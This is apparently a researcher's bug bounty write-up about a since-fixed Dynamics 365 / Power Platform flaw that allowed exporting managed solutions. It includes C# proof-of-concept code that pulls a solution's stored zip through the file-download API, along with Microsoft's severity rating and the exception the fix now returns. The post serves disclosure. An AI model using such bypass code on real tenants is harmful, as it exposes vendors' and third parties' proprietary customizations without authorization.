Microsoft has its own Bug Bounty Programs (opens new window), that covers various products and technologies such as .NET, Azure, AI, M365, D365 and others.
This post will be about Microsoft Dynamics 365 and Power Platform Bounty Program (opens new window). Microsoft invites individuals or organizations to identify security vulnerabilities in targeted Dynamics 365 and Power Platform applications and share them with our team. Qualified submissions are eligible for bounty rewards of $500 to $20,000 USD.
# Vulnerability Description
To read this article, you should have basic understading of solutions in Microsoft Power Platform & Dynamics 365. If you have no experience with Dynamics 365, it's okay. I put a description and links to the documentation below.
Solutions are how customizers and developers author, package, and maintain units of software that extend Dynamics 365 for Customer Engagement. There are two types of Dynamics 365 Customer Engagement solutions: managed and unmanaged. A managed solution is a completed solution that is intended to be distributed and installed. An unmanaged solution is one that is still under development or isn't intended to be distributed. Introduction to solutions (opens new window)
The following diagram introduces how managed and unmanaged solutions interact with the system solution to control application behavior. Solution Layers (opens new window)
My vulnerabilty is related to Managed Solutions. After you install a managed solution, the following applies:
- You can't add or remove solution components in a managed solution.
- You can't export a managed solution.
- Deleting a managed solution uninstalls all the solution components in it.
Let's focus on the second point. You can't export a managed solution. That means you can't download content as .zip archive. Actually, if you'll try to add managed components to unmanaged solution and then export it, all managed components will dissapear in the exported solution. Why doesn't Microsoft allow us to do this? In my opinion, there are 2 reasons for doing this:
The first-one, it will allow us to see/get all updates from Microsoft, that were delivered through a Solution Mechanism. You might think, that you can go to the solution in Power Apps and see all components. But you can only see the components that Microsoft allows you to see.
The second-one, is that you can get customizations that have been installed by third-party companies. In this case, customizations can be uploaded, modified, and then used by someone else.
# Solution Storage
As a Dynamics 365 Developer, I install solutions quite often. One day I asked myself a question: what happens after installing the solution and where is it stored? To find the answer to this question, let's look at the Solution table/entity reference (opens new window)
Here we can find "Fileid" column, which is designed to represent file id for the blob url used for file storage.
What is interesting, we can't query this column in SQL. Usually, Lookup columns (Many to One Relationship) return Guid of related record back.
This is because it is a "File Column". File columns are different from the other system columns that can store binary data because you can't directly set the values in a create or update operation, or retrieve the file data with the record. You must use the special methods to create, retrieve, update, or delete binary data for file columns. Use file column data (opens new window)
When a file column is created for a table, a new one-to-many relationship is created between the table and the FileAttachment table. The name of the relationship is {table logical name}_FileAttachments. For example, if the file column is part of the account table, the relationship name will be account_FileAttachments. To confuse it even more, the name of solution relationship differs from documentation naming (you can see it in SQL Server as a Foreign Key).
Also in Power Apps you can see the following (N:1) relationship, which is essentially a Lookup column.
When you import a solution into the environment, the fileattachment record is created behind the scenes.
So, answering the question, Solution Metadata is stored in solution (opens new window) and fileattachment (opens new window) tables (Database Storage) and Solution Content (.zip archive) is stored in File Storage.
# Bypass restriction for exporting Managed Solutions
I’ve provided instructions and C# code which will demonstrate the bypass. It should be executed through IOrganizationService.
# Proof of Concept
Follow these steps:
- Go to make.powerapps.com in our organization.
- Open Solutions and select "Managed"
- Select the solution which you want to export. In the URL, copy the id of the solution.
- Execute the following code. You can do it from Console Application using "PowerPlatform.Dataverse.Client" or write a plugin. By the way, if you are using plugin, you should save the solution somewhere else rather than saving it to the local machine.
# Code
using Microsoft.Crm.Sdk.Messages;
using Microsoft.PowerPlatform.Dataverse.Client;
using Microsoft.Xrm.Sdk;
namespace ExportSolution
{
internal class Program
{
private static void Main(string[] args)
{
using (var service = new ServiceClient("<Connection string to Dataverse Instance>"))
{
ExportManagedSolution(service,"solution", new Guid("<Solution Id>"), "fileid");
}
}
public static void ExportManagedSolution(IOrganizationService service, string solutionName, Guid recordGuid, string fileAttributeName)
{
var initializeFileBlocksDownloadRequest = new InitializeFileBlocksDownloadRequest
{
Target = new EntityReference(solutionName, recordGuid),
FileAttributeName = fileAttributeName
};
var initializeFileBlocksDownloadResponse = (InitializeFileBlocksDownloadResponse)
service.Execute(initializeFileBlocksDownloadRequest);
var downloadBlockRequest = new DownloadBlockRequest
{
FileContinuationToken = initializeFileBlocksDownloadResponse.FileContinuationToken
};
var downloadBlockResponse = (DownloadBlockResponse)service.Execute(downloadBlockRequest);
File.WriteAllBytes(initializeFileBlocksDownloadResponse.FileName, downloadBlockResponse.Data);
}
}
}
# Exploiting the Vulnerability
# Response from Microsoft
I reported this behavior Microsoft Security Response Center (opens new window). After two weeks of reviewing my report, I recieved the following email:
Bounty Award depends on the impact and severity of the vulnerability, and the quality of the submission. Microsoft determines the degree of reward as follows:
My case has the following assessment:
- Severity: Important
- Security Impact: Elevation of Privilege
- Report Quality: High
For more information, please visit Microsoft Dynamics 365 and Power Platform Bounty Program (opens new window).
# Vulnerability was Fixed
Now if you try to reproduce the steps described above, during the program execution you will get the following exception:
System.ServiceModel.FaultException`1 HResult=0x80131500
Message=External users are restricted from accessing files in solution and fileid
Source=Microsoft.PowerPlatform.Dataverse.Client
# Acknowledgements
The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has privately disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.